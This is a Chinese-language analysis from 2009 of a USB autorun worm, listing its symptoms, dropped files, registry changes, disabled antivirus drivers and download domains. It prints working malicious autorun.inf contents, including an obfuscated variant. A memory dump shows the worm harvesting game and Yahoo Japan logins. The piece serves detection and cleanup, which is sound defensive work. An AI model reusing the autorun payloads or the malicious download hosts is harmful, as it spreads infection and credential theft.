"U盘病毒" 的恶意行为重点 2009-02-11
目前已知中毒现象:
1.开启显示隐藏档或资料夹可是还是一样无法显示隐藏的档案或资料夹
2.进去我的电脑想要打开硬碟 如 c,d,e槽,却出现「选择程式来开启档案」
3.即时通登入后会自动关闭
4.防毒软体会被停用
5.新的防毒软体无法安装
6.无法以正常方式进入安全模式
7.夹带木马下载器
8.网路驱动程式发生错误 导致无法连线
9.破坏卡巴斯基驱动 导致无法更新或某些防护出错
建立档案
1.%systemdrive%\autorun.inf
autorun.inf 内容分析
复制程式
;ww9KrOoa8Li9diKi194p4oijej52K2A55fw4Hkd7i9d7wkC3wLK32k1qjSap4aZrf42
[AutoRun]
;ws6L2cijpA5lKksr0aKdAks1irm7k3skawd1ZawaLpDiok2k40jLk3a4sLwClwwr
open=8ot8y86.exe
;CoaA5Z4DloqLoAlDd15kDrKKs12a735wia4kDws2flda5il4aksrfA8Sq3kZ28rJo0e6Ld2Lkai2mS2sIwiqLs
shell\open\Command=8ot8y86.exe
;8lDqd48lkfo4arKqo92sk3DwsawJZir4wLdlSd3
shell\open\Default=1
;adLl62rK5LDLo44DKsqlq2L0Ka4kJkarliKsif3lLaa1fsO0f23K18aZ2jk73ksfkoAq54wdkfKIdjirdqqwd5koadaoAiojddDl5qkkeC3LSSiiaak8lUw
shell\explore\Command=8ot8y86.exe
;S5LdLZadf4Aw34LA0La0243UoawKck3keAk3a2kd4isKwk6fds2j7lDK3wK10LwjKKawi5os2ikSolrJCrp9i0aJq2AkIsraO2jpksa8301Dlijk
复制程式
[AutoRun]
Open=weiai.exe
Shell\Open=湖羲(&O)
Shell\Open\Command=weiai.exe
Shell\Open\Default=1
Shell\Explore=訧埭夺烩(&X)
Shell\Explore\Command=weiai.exe
根目录 生成物
2.%systemdrive%%systemdrive%\********.com exe bat cmd pif (不定)
ntde1ect.com
ntdelect.com
nldelect.com
nndelect.com
nsdelect.com
ntdeIect.com
erdeIect.com
XAdeIect.com
copetttt.com
ek.com
f.cmd
nncu6kk.com
g2p3s.exe
8e9gmih.bat
lg.cmd
um.cmd
q83iwmgf.bat
rn.exe
h.cmd
8h3hh3m.exe
bxuup9r.bat
w0owgn.bat
2ifetri.cmd
188qsm.bat
x.com
ep9otvan.com
3wcxx91.cmd
e.bat
8ot8y86.exe
t.exe
3g08.bat
3.
%System%%System%\kavo.exe
%System%\kavo0.dll~kavo9.dll
%System%\taso.exe
%System%\taso0~9.dll
%System%\tavo.exe
%System%\tavo0~9.dll
%System%\avpo.exe
%System%\avpo0~9.dll
%System%\amvo.exe
%System%\amvo0~9.dll
%System%\mmvo.exe
%System%\mmvo0~9.dll
%System%\mnso.exe
%System%\mnso0~9.dll
%System%\kxvo.exe
%System%\kxvo0.dll~kxvo9.dll
%System%\uret463.exe
%System%\lhgjyit0.dll~lhgjyit9.dll
%System%\kacsde.exe
%System%\godert0.dll~godert9.dll
%System%\jvvo.exe
%System%\jvvo0~9.dll
%System%\amwo.exe
%System%\amwo0~9.dll
%System%\j3ewro.exe
%System%\jwedsfdo0~9.dll
%System%\revo.exe
%System%\revo0~9.dll
%System%\lhgjyit0.dll
%System%\lhgjyit2.dll
%System%\uret463.exe
4.%windir%\Debug\***********.dll (乱码)
5.%windir%\help\**************.dll (乱码)
6.%windir%\fly32.dll
7.%WIndir%\poor32.dll
8.%Temp%\moil.dll
9.
C:\Documents and Settings\Administrator\Local Settings\Temp\*.dll
C:\Documents and Settings\Administrator\Local Settings\Temp\taso*
C:\Documents and Settings\Administrator\Local Settings\Temp\cc.exe
C:\WINDOWS\TEMP\taso*
C:\WINDOWS\TEMP\*.dll
注:在Win95/98/me %System% 预设值为 C:\windows\System
在WinNT/2000/XP/2003 %System% 系统预设值为 C:\WinNT\System32
建立进程
wuauclt.exe
explorer.exe
IEXPLORER.EXE
gigaget.exe
utorrent.exe
msnmsgr.exe
载入系统服务-
explorer.exe(由kavo1.dll执行)
破坏网路驱动
c:\windows\system32\drivers\tdi.sys
c:\windows\system32\drivers\psched.sys
c:\windows\system32\drivers\tcpip.sys
j3ewro.exe 破坏卡巴斯基驱动 导致无法更新或某些防护出错
c:\windows\system32\j3ewro.exe
c:\windows\system32\drivers\vga.sys
c:\windows\system32\drivers\klif.sys
c:\windows\system32\cdplay.sys
新增登录档-
开机自启动区
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\kavo =
"%System%\kavo.exe" (开机后启动)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<anhtaaa><C:\WINDOWS\system32\kacsde.exe>
<dorfgwe><C:\WINDOWS\system32\uret463.exe>
kavo.exe
kxvo.exe
tavo.exe
mnsa.exe
avpa.exe
amva.exe
tava.exe
tasa.exe
kava.exe
amwa.exe
jvsoft.exe
tasoft.exe
kmmsoft.exe
kacsde.exe
uret463.exe
建立机码
{7A908760-8000-4000-A000-9000322145A7}
{59109876-7619-9101-7012-901938475195}
{EC69134A-F15F-D14D-A31A-C31C4D124FCE}
{35FD6584-698F-BCD2-602C-698745210353}
{B1954FAC-1023-154F-895A-1458258AD81B}
{AA041F13-A111-12A3-B0CF-F99818AA68AA}
{21BE5FDF-D4CB-4850-AD99-21E68B50BF3F}
{27E1C1B0-7117-4582-8565-682E569810D2}
{FBF3B337-FEB6-403B-BBE2-2B67CB6563E3}
{5D7ED61B-DB3E-44EC-BED5-40307384FF81}
{47994C89-1857-4D33-B196-263ED6FA4CFF}
{FBF3B337-FEB6-403B-BBE2-2B67CB6563E3}
{E996F10E-FCAF-41CC-94C8-B8BF7D6F80AC}
{B058B02A-AC93-4FBA-900B-FA44D9B92805}
{79FC744E-75CA-49B0-8F02-AEAE4CAACBE0}
{749E4FEF-6AFF-41A6-AED8-364222D455A7}
{894C0068-46AC-4F59-A140-EDE0DABA776C}
{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}
登录档修改
登录档修改[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
CheckedValue = 0x00000000 (隐藏于系统当中)
从网路上下载-木马变种
http://det67.com...c1.rar %Temp%\cc1.rar
hxxp://www.1a123.com/jj/cc.rar (%Temp%\cc.rar)
http://13opd.com/...u1.rar %Temp%\uu1.rar
http://vfqa4.com...l.rar %Temp%\ll.rar
http://dfvg2.com/...lp.rar %Temp%\help.rar
http://mgaazz.com...dr.rar %System%\ddr.exe
http://det67.com...c1.rar %Temp%\cc1.rar
1a123.com... - 61.162.230.89
1a123.com
456kill.com
om7890.com... - 60.169.1.92
Microsofthg.com
Microsoftmg.com
Microsoftrb.com
Om7890.com
Tw7890.com
直接从explorer.exe记忆体区块读取的资料.
复制程式
015B2480 CLSID\MADOWN coc.exe aaa.dat XZQURSASABXAWLASOLSFSIKDQ_MN
015B24C0 NoDriveTypeAutoRun Software\Microsoft\Windows\CurrentVersion\Po
015B2500 licies\Explorer CheckedValue Software\Microsoft\Windows\Curre
015B2540 ntVersion\explorer\Advanced\Folder\Hidden\SHOWALL ShowSuperHid
015B2580 den Hidden Software\Microsoft\Windows\CurrentVersion\Explorer\A
015B25C0 dvanced \explorer.exe nhkletd SoftWare\Microsoft\Windows\Curre
015B2600 ntVersion\Run autorun.inf %s%s C:\ IEFrame explorer.exe
015B2640 iexplore.exe Forthgoer 庵侐 211.13.235.228 庵゙ 211.
015B2680 13.235.227 庵媪 211.13.235.226 庵珨 211.13.235.229 Rage
015B26C0 xe.exe 40000 Altair(Non-PvP)
015B2700 40001 Arcturus 40002
015B2740 Vega(Non-PvP) 40003 Rigel
015B2780 40004 Sirius
015B27C0 40005 Canopus
015B2800 %s(%d)/ lin.bin %d=%s http
015B2840 s://login.yahoo.co.jp/config/login_verify2?.src=ym https://logi
015B2880 n.yahoo.co.jp/config/login? YahooWidgetEngine.exe YPagerj.exe
015B28C0 ? ? S-1-5-21-1409082233-839522115-1060284298-1003\So
015B2900 ftware\YahooJapan SHDeleteKeyA shlwapi.dll passwd 绞ゴ怀フ
015B2940 腔%s:%s login h t t p i?
015BFAC0 0u http://vfqa4.com/rbv/uu.rar
015C3000 胡0 蛞竽栓妨怯阐阐阐阐阐阐阐阐阐阐阐[AutoRun] ;44olSdjsmrpd3w
015C3040 iDHqoLa000lkjri0akiAa7Jk69kk9sd8kawsroep93wSLDr3rsa3SZkq8wsJilai
015C3080 jDefiwaaic30n5oK3os3DjaXFdsw2K1fiLa2aoKwrsj open=q6h6j.com ;jr
015C30C0 l7edjkwnjslke204riraZFl2iiLj1wdK7Ko5sok3l04w4D3ik3kkDrCLwk0o2eqq
015C3100 od9d2qsK54fw02Dd2ipoiwKwlJdKk4w8Dfsew41ifJ9sDKAarIa3rk shell\op
015C3140 en\Command=q6h6j.com
